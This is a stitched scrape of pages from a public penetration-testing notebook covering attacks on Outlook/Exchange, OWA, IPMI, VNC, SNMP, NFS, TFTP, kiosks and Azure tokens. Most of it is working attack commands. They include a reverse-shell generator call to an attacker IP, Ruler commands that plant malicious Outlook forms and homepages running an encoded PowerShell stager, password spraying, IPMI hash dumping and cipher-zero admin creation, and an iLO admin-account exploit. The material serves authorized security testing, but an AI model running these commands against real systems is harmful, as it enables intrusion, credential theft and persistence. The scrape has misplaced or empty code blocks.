user@remote:~$ reset # Set rows and columns for proper text aligning user@remote:~$ stty rows ${ROWS} cols ${COLS} # For CTRL-L to work user@remote:~$ export TERM=xterm / xterm-color / xterm-256color # (optional) Get Bash new process image user@remote:~$ exec /bin/bash [-l] [](https://ppn.snovvcra.sh/pentest/shells#tools) Tools ----------------------------------------------------------- * [http://www.jackson-t.ca/runtime-exec-payloads.html](http://www.jackson-t.ca/runtime-exec-payloads.html) ### [](https://ppn.snovvcra.sh/pentest/shells#shellpop) ShellPop * [https://github.com/0x00-0x00/ShellPop](https://github.com/0x00-0x00/ShellPop) Bash reverse TCP example: ### [](https://ppn.snovvcra.sh/pentest/shells#pwncat) pwncat * [https://securixy.kz/hack-faq/pwncat-netcat-na-steroidah.html/](https://securixy.kz/hack-faq/pwncat-netcat-na-steroidah.html/) * [https://github.com/cytopia/pwncat](https://github.com/cytopia/pwncat) ### [](https://ppn.snovvcra.sh/pentest/shells#xxh) xxh * [https://github.com/xxh/xxh](https://github.com/xxh/xxh) Last updated 8 months ago * [Upgrade to PTY](https://ppn.snovvcra.sh/pentest/shells#upgrade-to-pty) * [Tools](https://ppn.snovvcra.sh/pentest/shells#tools) * [ShellPop](https://ppn.snovvcra.sh/pentest/shells#shellpop) * [pwncat](https://ppn.snovvcra.sh/pentest/shells#pwncat) * [xxh](https://ppn.snovvcra.sh/pentest/shells#xxh) Copy $ shellpop -H 10.10.13.37 -P 9001 --reverse --number 8 --base64 Copy $ pipx install xxh-xxh $ source xxh.zsh -i id_rsa snovvcrash@192.168.1.11 +I xxh-plugin-zsh-ohmyzsh +if [+q/+vv] $ ssh -i id_cthulhu snovvcrash@192.168.1.11 -f "rm -rf .xxh" --- # Outlook | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/outlook.md) . [](https://ppn.snovvcra.sh/pentest/perimeter/outlook#ruler) Ruler ---------------------------------------------------------------------- * [https://github.com/sensepost/ruler/releases](https://github.com/sensepost/ruler/releases) ### [](https://ppn.snovvcra.sh/pentest/perimeter/outlook#rules) Rules * [https://github.com/sensepost/ruler/wiki/Rules](https://github.com/sensepost/ruler/wiki/Rules) * [https://silentbreaksecurity.com/malicious-outlook-rules/](https://silentbreaksecurity.com/malicious-outlook-rules/) ### [](https://ppn.snovvcra.sh/pentest/perimeter/outlook#forms) Forms * [https://github.com/sensepost/ruler/wiki/Forms](https://github.com/sensepost/ruler/wiki/Forms) * [https://sensepost.com/blog/2017/outlook-forms-and-shells/](https://sensepost.com/blog/2017/outlook-forms-and-shells/) Display forms: Copy $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e snovvcrash@megacorp.com --verbose --debug form display Exploit: Copy $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e snovvcrash@megacorp.com --verbose --debug form add --suffix test-form --input vbs-payload.txt --send `vbs-payload.txt`: Copy CreateObject("WScript.Shell").Run "powershell -exec bypass -enc ", 0, false Clean up: Empire stager encryption: ### [](https://ppn.snovvcra.sh/pentest/perimeter/outlook#homepage) Homepage * [https://github.com/sensepost/ruler/wiki/Homepage](https://github.com/sensepost/ruler/wiki/Homepage) * [https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/](https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/) Exploit: `homepage.html`: Clean up: Stager encryption is the same as for Ruler/Forms. Last updated 3 years ago * [Ruler](https://ppn.snovvcra.sh/pentest/perimeter/outlook#ruler) * [Rules](https://ppn.snovvcra.sh/pentest/perimeter/outlook#rules) * [Forms](https://ppn.snovvcra.sh/pentest/perimeter/outlook#forms) * [Homepage](https://ppn.snovvcra.sh/pentest/perimeter/outlook#homepage) Copy $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e snovvcrash@megacorp.com --verbose --debug form delete --suffix test-form Copy $ grep -e output_type -e payload_type -e clean_output -e userdomain genetic.config output_type = GO payload_type = DLL_x64 clean_output = True userdomain = 'MEGACORP' $ python ebowla.py https443.dll genetic.config $ ./build_x64_go.sh output/go_symmetric_https443.dll.go https443.exe --hidden Copy $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e snovvcrash@megacorp.com --verbose --debug homepage add --url http://10.10.13.37/homepage.html Copy Outlook Copy $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e snovvcrash@megacorp.com --verbose --debug homepage delete --- # VNC | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/vnc.md) . Enum with MSF: Copy msf > use auxiliary/scanner/vnc/vnc_none_auth msf > set RHOSTS file:vnc.txt msf > set THREADS 25 msf > run [](https://ppn.snovvcra.sh/pentest/infrastructure/vnc#tightvnc) TightVNC ----------------------------------------------------------------------------- * [https://github.com/frizb/PasswordDecrypts](https://github.com/frizb/PasswordDecrypts) Decrypt TightVNC password with MSF: Copy msf > irb >> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07" => "\u0017Rk\u0006#NX\a" >> require 'rex/proto/rfb' => true >> Rex::Proto::RFB::Cipher.decrypt ["f0f0f0f0f0f0f0f0"].pack('H*'), fixedkey => "" Last updated 1 year ago --- # NFS | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/nfs.md) . * [https://resources.infosecinstitute.com/exploiting-nfs-share/](https://resources.infosecinstitute.com/exploiting-nfs-share/) * [https://blog.christophetd.fr/write-up-vulnix/](https://blog.christophetd.fr/write-up-vulnix/) * [https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe) [](https://ppn.snovvcra.sh/pentest/infrastructure/nfs#nmap) Nmap --------------------------------------------------------------------- Discover rpcbind: Copy $ sudo nmap -sV --script rpcinfo 10.10.13.37 -p111 Run Nmap scripts: Copy $ sudo nmap -sV --script 'nfs*' 10.10.13.37 -p2049 [](https://ppn.snovvcra.sh/pentest/infrastructure/nfs#mount) Mount ----------------------------------------------------------------------- Copy $ showmount -e 10.10.13.37 $ sudo mount -v -t nfs -o vers=3 -o nolock -o user=snovvcrash,pass='Passw0rd!' 10.10.13.37:/home /mnt/nfs Last updated 4 years ago * [Nmap](https://ppn.snovvcra.sh/pentest/infrastructure/nfs#nmap) * [Mount](https://ppn.snovvcra.sh/pentest/infrastructure/nfs#mount) --- # SNMP | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/snmp.md) . Discover devices with default community strings: Copy msf > use auxiliary/scanner/snmp/snmp_login msf > set PASSWORD public msf > set RHOSTS file:snmp.txt msf > set THREADS 25 msf > set VERBOSE false msf > set VERSION 2c msf > run [](https://ppn.snovvcra.sh/pentest/infrastructure/snmp#onesixtyone) onesixtyone ------------------------------------------------------------------------------------ * [https://github.com/trailofbits/onesixtyone](https://github.com/trailofbits/onesixtyone) Brute force community strings: Copy $ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.10.13.37 [](https://ppn.snovvcra.sh/pentest/infrastructure/snmp#snmp-check) snmp-check ---------------------------------------------------------------------------------- Collect data: Copy $ snmp-check -v 2c -c public 10.10.13.37 $ for i in `seq 1 254`; do snmp-check -v 2c -c public -t1 10.10.13.$i | grep -aA2 'System information'; done [](https://ppn.snovvcra.sh/pentest/infrastructure/snmp#snmpwn) snmpwn -------------------------------------------------------------------------- * [https://github.com/hatlord/snmpwn](https://github.com/hatlord/snmpwn) Last updated 3 years ago * [onesixtyone](https://ppn.snovvcra.sh/pentest/infrastructure/snmp#onesixtyone) * [snmp-check](https://ppn.snovvcra.sh/pentest/infrastructure/snmp#snmp-check) * [snmpwn](https://ppn.snovvcra.sh/pentest/infrastructure/snmp#snmpwn) Copy $ ./snmpwn.rb --hosts hosts.txt --users users.txt --passlist passwords.txt --enclist passwords.txt --- # OWA | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/owa.md) . [](https://ppn.snovvcra.sh/pentest/perimeter/owa#enumerate-users) Enumerate Users -------------------------------------------------------------------------------------- * [https://www.triaxiomsecurity.com/2019/03/15/vulnerability-walkthrough-timing-based-username-enumeration/](https://www.triaxiomsecurity.com/2019/03/15/vulnerability-walkthrough-timing-based-username-enumeration/) * [https://www.intruder.io/blog/user-enumeration-in-microsoft-products-an-incident-waiting-to-happen](https://www.intruder.io/blog/user-enumeration-in-microsoft-products-an-incident-waiting-to-happen) Authentication Request Kerberos Process Response Time Non-existing realm KDC searches for realm 2-3 seconds Realm exists but username does not exist Pre-authentication ticket created to verify username 5-60 seconds Realm and username exists Pre-authentication ticket created to verify password < 2 seconds > "Responses in different environments may have different response times but the pattern in the timing response behavior still exist." ([ref](http://h.foofus.net/?p=784) > ) ### [](https://ppn.snovvcra.sh/pentest/perimeter/owa#msf) MSF Copy msf > use auxiliary/scanner/http/owa_login msf > set RHOST mx.megacorp.local msf > set USER_FILE owa-users.txt msf > set PASSWORD dummyPassword msf > set THREADS 15 msf > run ### [](https://ppn.snovvcra.sh/pentest/perimeter/owa#mailsniper) MailSniper * [https://github.com/dafthack/MailSniper](https://github.com/dafthack/MailSniper) [](https://ppn.snovvcra.sh/pentest/perimeter/owa#password-spray) Password Spray ------------------------------------------------------------------------------------ ### [](https://ppn.snovvcra.sh/pentest/perimeter/owa#ruler) Ruler * [https://github.com/sensepost/ruler/wiki/Brute-Force#brute-force-for-credentials](https://github.com/sensepost/ruler/wiki/Brute-Force#brute-force-for-credentials) Autodiscover URL implicit: Autodiscover URL explicit: Notes: * In users.txt there's only "username" on a line, not "DOMAIN\\username". * Errors like `ERROR: 04:27:43 brute.go:193: An error occured in connection - Get https://autodiscover.megacorp.com/autodiscover/autodiscover.xml: Get https://autodiscover.megacorp.com/autodiscover/autodiscover.xml: net/http: request canceled` do **not** affect the current password probe. [](https://ppn.snovvcra.sh/pentest/perimeter/owa#enumerate-ntlm) Enumerate NTLM ------------------------------------------------------------------------------------ * [https://github.com/nyxgeek/ntlmscan](https://github.com/nyxgeek/ntlmscan) * [https://gist.github.com/aseering/829a2270b72345a1dc42](https://gist.github.com/aseering/829a2270b72345a1dc42) ### [](https://ppn.snovvcra.sh/pentest/perimeter/owa#nmap) Nmap ### [](https://ppn.snovvcra.sh/pentest/perimeter/owa#msf-1) MSF ### [](https://ppn.snovvcra.sh/pentest/perimeter/owa#mailsniper-1) MailSniper * [https://github.com/dafthack/MailSniper](https://github.com/dafthack/MailSniper) Last updated 4 years ago * [Enumerate Users](https://ppn.snovvcra.sh/pentest/perimeter/owa#enumerate-users) * [MSF](https://ppn.snovvcra.sh/pentest/perimeter/owa#msf) * [MailSniper](https://ppn.snovvcra.sh/pentest/perimeter/owa#mailsniper) * [Password Spray](https://ppn.snovvcra.sh/pentest/perimeter/owa#password-spray) * [Ruler](https://ppn.snovvcra.sh/pentest/perimeter/owa#ruler) * [Enumerate NTLM](https://ppn.snovvcra.sh/pentest/perimeter/owa#enumerate-ntlm) * [Nmap](https://ppn.snovvcra.sh/pentest/perimeter/owa#nmap) * [MSF](https://ppn.snovvcra.sh/pentest/perimeter/owa#msf-1) * [MailSniper](https://ppn.snovvcra.sh/pentest/perimeter/owa#mailsniper-1) Copy PS > Invoke-UsernameHarvestOWA -ExchHostname mx.megacorp.com -Domain MEGACORP -UserList .\owa-users.txt -Threads 25 -OutFile owa-valid-users.txt Copy $ ./ruler -k -d megacorp.com brute --users users.txt --passwords passwords.txt --delay 35 --attempts 3 --verbose | tee -a ruler-blood.out Copy $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com brute --users users.txt --passwords passwords.txt --delay 35 --attempts 3 --verbose | tee -a ruler-all.out Copy $ sudo nmap -sV --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p443 mx.megacorp.com Copy msf > use auxiliary/scanner/http/owa_login msf > set AUTH_TIME false msf > set RHOST mx.megacorp.local msf > set USERNAME dummyUser msf > set PASSWORD dummyPassword msf > run Copy PS > Invoke-DomainHarvestOWA -ExchHostname mx.megacorp.com --- # TFTP | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/tftp.md) . Enum with Nmap: Copy $ sudo nmap -sVU -p69 --script tftp-enum 10.10.13.37 [](https://ppn.snovvcra.sh/pentest/infrastructure/tftp#brute-force-filenames) Brute Force Filenames -------------------------------------------------------------------------------------------------------- Make a list of potential filenames. Use 8.3 notation: Copy PS > cmd /c dir /x PS > cmd /c "for %I in (.) do @echo %~sI" Download Python TFTP implementation and use the Bash script below: * [https://github.com/m4tx/pyTFTP](https://github.com/m4tx/pyTFTP) Copy $ git clone https://github.com/m4tx/pyTFTP && cd pyTFTP $ ./tftp-brute.sh 10.10.13.37 files.txt tftp-brute.sh Copy #!/usr/bin/env bash IP=$1 FILES=$2 while IFS= read -r file; do echo -n "[*] Trying ${file}... " if ./client.py -g "${file}" "${IP}" > /dev/null 2>&1; then echo "SUCCESS" else echo "FAIL" fi done < "${FILES}" Last updated 4 years ago --- # Kiosk Breakout | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/kiosk-breakout.md) . * [http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net/) [](https://ppn.snovvcra.sh/pentest/infrastructure/kiosk-breakout#windows) Windows -------------------------------------------------------------------------------------- * [https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/) * [https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/) * [https://habr.com/ru/company/dsec/blog/505600/](https://habr.com/ru/company/dsec/blog/505600/) Navigating with environment variables and `shell` directive: ENV Location `%HOMEDRIVE%`, `%SystemDrive%` "C:\\" `%WINDIR%`, `%SystemRoot%` "C:\\Windows" `%PROGRAMFILES%` "C:\\Program Files" `%COMSPEC%` "C:\\Windows\\System32\\cmd.exe" `%COMMONPROGRAMFILES%` "C:\\Program Files\\Common Files" `%HOMEPATH%`, `%USERPROFILE%` "C:\\Documents and Settings\\Username" `%ALLUSERSPROFILE%` "C:\\Documents and Settings\\All Users" `%PROGRAMFILES(X86)%` "C:\\Program Files (x86)" (only in 64-bit version) `%APPDATA%` "C:\\Documents and Settings\\Username\\Application Data" `%TEMP%`, `%TMP%` "C:\\Documents and Settings\\Username\\Local Settings\\Temp" `%COMMONPROGRAMFILES(x86)%` "C:\\Program Files (x86)\\Common Files" (only in 64-bit version) Command Location shell:System "C:\\Windows\\System32" shell:Downloads Current user's "Downloads" folder shell:MyComputerFolder "This PC" window [](https://ppn.snovvcra.sh/pentest/infrastructure/kiosk-breakout#linux) Linux ---------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/infrastructure/kiosk-breakout#gtkdialog) gtkdialog HTLM-based pseudo terminal emulator (useful when there's no other terminal apps available): The shell can be invoked with `/usr/bin/gtkdialog -f shell.html` Last updated 4 years ago * [Windows](https://ppn.snovvcra.sh/pentest/infrastructure/kiosk-breakout#windows) * [Linux](https://ppn.snovvcra.sh/pentest/infrastructure/kiosk-breakout#linux) * [gtkdialog](https://ppn.snovvcra.sh/pentest/infrastructure/kiosk-breakout#gtkdialog) shell.html Copy CMDOUTPUT /tmp/termout.txt CMDTORUN --- # IPMI | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi.md) . * [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/) * [https://habr.com/ru/company/selectel/blog/439834/](https://habr.com/ru/company/selectel/blog/439834/) [](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#discovery) Discovery -------------------------------------------------------------------------------- Copy msf > use auxiliary/scanner/ipmi/ipmi_version msf > set RHOSTS file:ipmi.txt msf > set THREADS 25 msf > run [](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#dump-hashes) Dump Hashes ------------------------------------------------------------------------------------ **CVE-2013-4786** Dump hashes: Copy msf > use auxiliary/scanner/ipmi/ipmi_dumphashes msf > set OUTPUT_HASHCAT_FILE ipmi_hashes.txt msf > set RHOSTS file:ipmi.txt msf > set THREADS 25 msf > run Recover plaintext passwords: Copy $ hashcat -m 7300 -O -a 0 -w 3 --session=ipmi -o ipmi.out ipmi.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username [](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#cipher-zero) Cipher Zero ------------------------------------------------------------------------------------ **CVE-2013-4805** Discover with MSF: Guess existing admin username. If `ADMIN` username is correct, the `list` command will succeed (password doesn't matter): Add new admin user (only existing admin username is needed): [](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#anonymous-authentication) Anonymous Authentication -------------------------------------------------------------------------------------------------------------- Can be discovered with MSF `ipmi_dumphashes` but also with ipmitool: Change password of a named user account: [](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#hpe-ilo-4) HPE iLO 4 -------------------------------------------------------------------------------- * [https://codeby.net/threads/poluchaem-dostup-k-hp-ilo.63224/](https://codeby.net/threads/poluchaem-dostup-k-hp-ilo.63224/) * [https://github.com/airbus-seclab/ilo4\_toolbox](https://github.com/airbus-seclab/ilo4_toolbox) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#add-admin-user) Add Admin User **CVE-2017-12542** Exploit with Python: * [https://www.exploit-db.com/exploits/44005](https://www.exploit-db.com/exploits/44005) Exploit with MSF: Last updated 2 years ago * [Discovery](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#discovery) * [Dump Hashes](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#dump-hashes) * [Cipher Zero](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#cipher-zero) * [Anonymous Authentication](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#anonymous-authentication) * [HPE iLO 4](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#hpe-ilo-4) * [Add Admin User](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi#add-admin-user) Copy msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero msf > set RHOSTS file:ipmi.txt msf > set THREADS 25 msf > run Copy $ sudo apt install ipmitool $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user list Copy $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set name snovvcrash $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set password 'Passw0rd!' $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user priv 4 $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user enable Copy $ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user list Copy $ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user set password 'Passw0rd!' Copy $ ./44005.py -t -e -u snovvcrash -p 'Passw0rd!' 127.0.0.1 Copy msf > use auxiliary/admin/hp/hp_ilo_create_admin_account msf > set RHOSTS 10.10.13.37 msf > set USERNAME snovvcrash msf > run --- # On-Prem ↔ Cloud | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud.md) . [Cloud → On-Prem](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/cloud-on-prem) [On-Prem → Cloud](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud) Last updated 1 year ago --- # PRT Abuse | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/prt-abuse.md) . * [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) * [https://aadinternals.com/post/prt/](https://aadinternals.com/post/prt/) * [https://posts.specterops.io/an-operators-guide-to-device-joined-hosts-and-the-prt-cookie-bcd0db2812c4](https://posts.specterops.io/an-operators-guide-to-device-joined-hosts-and-the-prt-cookie-bcd0db2812c4) Copy $ roadrecon auth --prt-init Cmd > ROADToken.exe $ [proxychains] roadrecon auth [-d megacorp.db] --prt-cookie [-ua ''] [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/prt-abuse#tools) Tools -------------------------------------------------------------------------------------- * [https://github.com/dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) * [https://github.com/leechristensen/RequestAADRefreshToken/](https://github.com/leechristensen/RequestAADRefreshToken/) Last updated 1 year ago --- # Cloud → On-Prem | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/cloud-on-prem.md) . * [https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d](https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d) Last updated 1 year ago --- # Exchange | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/exchange.md) . * [https://exchangeserverversions.blogspot.com/](https://exchangeserverversions.blogspot.com/) * [https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/](https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/) * [https://pentestnotes.ru/notes/owa\_pentest\_guide/](https://pentestnotes.ru/notes/owa_pentest_guide/) ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2FOrange-Cyberdefense%2Farsenal%2Fmaster%2Fmindmap%2FPentesting_MS_Exchange_Server_on_the_Perimeter.png&width=768&dpr=3&quality=100&sign=ad157abf&sv=2) Pentesting Exchange Mindmap Discover Exchange servers on the Perimeter from a large scope of subdomains: Check its build number and correlate it with [release dates](https://learn.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates) : Linux (from outside) Windows (from inside) [](https://ppn.snovvcra.sh/pentest/perimeter/exchange#gal) GAL ------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/perimeter/exchange#ruler) Ruler ### [](https://ppn.snovvcra.sh/pentest/perimeter/exchange#mailsniper) MailSniper ### [](https://ppn.snovvcra.sh/pentest/perimeter/exchange#oab) OAB Search for `` node using Burp: Or with a Python [script](https://gist.github.com/snovvcrash/4e76aaf2a8750922f546eed81aa51438) : Get `oab.xml` and then `oab.lzx`: Install libmspack: Parse `oab.lzx` into `oab.txt` and extract emails from `oab.txt` with a regexp: [](https://ppn.snovvcra.sh/pentest/perimeter/exchange#activesync) ActiveSync --------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/perimeter/exchange#peas) PEAS * [https://labs.f-secure.com/archive/accessing-internal-fileshares-through-exchange-activesync/](https://labs.f-secure.com/archive/accessing-internal-fileshares-through-exchange-activesync/) * [https://labs.f-secure.com/tools/peas-access-internal-fileshares-through-exchange-activesync/](https://labs.f-secure.com/tools/peas-access-internal-fileshares-through-exchange-activesync/) * [https://github.com/FSecureLABS/peas](https://github.com/FSecureLABS/peas) * [https://github.com/snovvcrash/peas](https://github.com/snovvcrash/peas) * [https://github.com/sensepost/thumbscr-ews](https://github.com/sensepost/thumbscr-ews) Install: Run: ### [](https://ppn.snovvcra.sh/pentest/perimeter/exchange#how-to) How-To 1\. Use Nmap `http-ntlm-info` to get NetBIOS domain name and Exchange hostname: hunting for hostname pattern prefix if there is one. 2\. Locate DC (guess it trying hostname pattern prefix) and mirror `\\DC01\SYSVOL\megacorp.local\` share with `--crawl-unc` function: 3\. Find, xargs and grep for keywords in files: `password`, NetBIOS domain name (for additional account names), hostname pattern prefix (for additional hosts/shares): 4\. (optional) Brute other share names: [](https://ppn.snovvcra.sh/pentest/perimeter/exchange#cve-2020-0688) CVE-2020-0688 --------------------------------------------------------------------------------------- * [https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys](https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys) * [https://github.com/pwntester/ysoserial.net/releases](https://github.com/pwntester/ysoserial.net/releases) * [https://github.com/MrTiz9/CVE-2020-0688](https://github.com/MrTiz9/CVE-2020-0688) [](https://ppn.snovvcra.sh/pentest/perimeter/exchange#nspi) NSPI --------------------------------------------------------------------- * [https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/](https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/) * [https://github.com/ptswarm/impacket](https://github.com/ptswarm/impacket) * `>= Impacket v0.9.22.dev1+20200819.170651.b5fa089b` List Address Books and count entities in every one of them: Dump any specified Address Book by its name or GUID: Return AD objects by their GUIDs: Dump all AD records via requesting DNTs: [](https://ppn.snovvcra.sh/pentest/perimeter/exchange#tools) Tools ----------------------------------------------------------------------- * [https://github.com/mhaskar/ExchangeFinder](https://github.com/mhaskar/ExchangeFinder) Last updated 8 months ago * [GAL](https://ppn.snovvcra.sh/pentest/perimeter/exchange#gal) * [Ruler](https://ppn.snovvcra.sh/pentest/perimeter/exchange#ruler) * [MailSniper](https://ppn.snovvcra.sh/pentest/perimeter/exchange#mailsniper) * [OAB](https://ppn.snovvcra.sh/pentest/perimeter/exchange#oab) * [ActiveSync](https://ppn.snovvcra.sh/pentest/perimeter/exchange#activesync) * [PEAS](https://ppn.snovvcra.sh/pentest/perimeter/exchange#peas) * [How-To](https://ppn.snovvcra.sh/pentest/perimeter/exchange#how-to) * [CVE-2020-0688](https://ppn.snovvcra.sh/pentest/perimeter/exchange#cve-2020-0688) * [NSPI](https://ppn.snovvcra.sh/pentest/perimeter/exchange#nspi) * [Tools](https://ppn.snovvcra.sh/pentest/perimeter/exchange#tools) Copy $ cat subdomains.txt sub1.example.com sub2.example.ru sub3.example.bz $ for i in `cat subdomains.txt | rev | cut -d. -f1-2 | rev | sort -u`; do echo https://autodiscover.$i; done | httpx -silent -random-agent -fr -t 20 -sc -title -td -ip | grep Outlook | grep -oP '\d+\.\d+\.\d+\.\d+' | dnsx -silent -re -ptr 1.3.3.7 [mx1.example.com] 66.66.66.66 [mx2.example.ru] 123.123.123.123 [mx3.example.bz] Copy $ curl -sSL https://mx1.example.com/owa/auth/logon.aspx | grep favicon.ico Copy add-type @" using System.Net; using System.Security.Cryptography.X509Certificates; public class TrustAllCertsPolicy : ICertificatePolicy { public bool CheckValidationResult( ServicePoint srvPoint, X509Certificate certificate, WebRequest request, int certificateProblem) { return true; } } "@ [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy (curl -UseBasicParsing -MaximumRedirection 0 https://exch01).Headers."X-OWA-Version" Copy $ ./ruler -k -d megacorp.com -u snovvcrash -p 'Passw0rd!' -e snovvcrash@megacorp.com --verbose abk dump -o gal.txt Copy PS > Get-GlobalAddressList -ExchHostname mx.megacorp.com -UserName MEGACORP\snovvcrash -Password 'Passw0rd!' -OutFile gal.txt Copy POST /autodiscover/autodiscover.xml HTTP/1.1 Host: mx.megacorp.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Authorization: Basic TUVHQUNPUlBcc25vdnZjcmFzaDpQYXNzdzByZCEK Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: text/xml Content-Length: 350 snovvcrash@megacorp.com http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a Copy $ ./oaburl.py MEGACORP/snovvcrash:'Passw0rd!'@mx.megacorp.com -e 'exists@megacorp.com' [*] Authenticated users's SID (X-BackEndCookie): S-1-5-21-3167813660-1240564177-918740779-3102 [+] DisplayName: Sam Freeside [+] Server: 00ff00ff-00ff-00ff-00ff-00ff00ff00ff@megacorp.com 